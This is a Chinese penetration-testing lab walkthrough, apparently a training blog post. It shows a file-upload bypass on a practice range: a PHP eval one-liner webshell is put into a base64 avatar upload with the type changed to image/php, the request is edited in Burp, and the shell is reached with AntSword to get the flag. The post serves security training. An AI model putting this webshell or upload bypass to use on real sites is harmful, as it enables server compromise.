首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >某靶场的通关记录,渗透初学者提升技能的好文!

某靶场的通关记录,渗透初学者提升技能的好文!

原创
作者头像
雨笋教育
修改2021-09-28 14:30:43
3980
修改2021-09-28 14:30:43
举报
文章被收录于专栏:雨笋教育雨笋教育

某靶场题目的通关记录,反正是不知道叫啥~

打开页面之后,

在右上角这一块有注册登录

那没的说,有这个,必定是先注册登录一波。

登录之后跳转到个人中心,

看到有一个修改头像的地方~

接下来……

上图片马还是直接上一句话?

嗯……要不还是来个一句话试试先~

直接小手点一点插件,发现是PHP的脚本语言。

来个PHP一句话马~

了~

尝试看看能不能直接上马,但是…

那就打开BP来拦包~

传个正常的图片抓个包看看~

发现内容是加密传输的,那就…… 整上

保留前面的这一段后面我们直接写一句话马:

image=data:image/jpeg;,

所以这一段内容为:

image=data:image/jpeg;,<?php @eval($_POST['yusun']); ?>

接下来,需要更改一下类型,

image/jpeg 改为 image/php

使其当成php存储

然后把一句话马的内容加密

将数据包里的原内容删除

替换为我们加密后的内容

点击发送数据包。

通过响应包发现有个保存路径

打开蚁剑尝试连接一下

将响应包所返回路径中反斜杠去掉

拼接URL,填入密码,测试连接~

哎嘿,绿色就是好看。

在目录里面找到了Flag文件,复制内容,提交~

就很perfect~相当完美。

后续将给大家带来更多靶场实操案例,更多渗透测试干货持续关注雨笋教育小编

*本文章仅供技术交流分享,请勿做未授权违法攻击,雨笋教育不负任何责任。具体请参考《网络安全法》。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
漏洞扫描服务
漏洞扫描服务(Vulnerability Scan Service,VSS) 是一款自动探测企业网络资产并识别其风险的产品。依托腾讯二十年累积的安全能力,漏洞扫描服务能够对企业的网络设备及应用服务的可用性、安全性与合规性等进行定期的安全扫描、持续性风险预警和漏洞检测,并且为企业提供专业的修复建议,降低企业安全风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档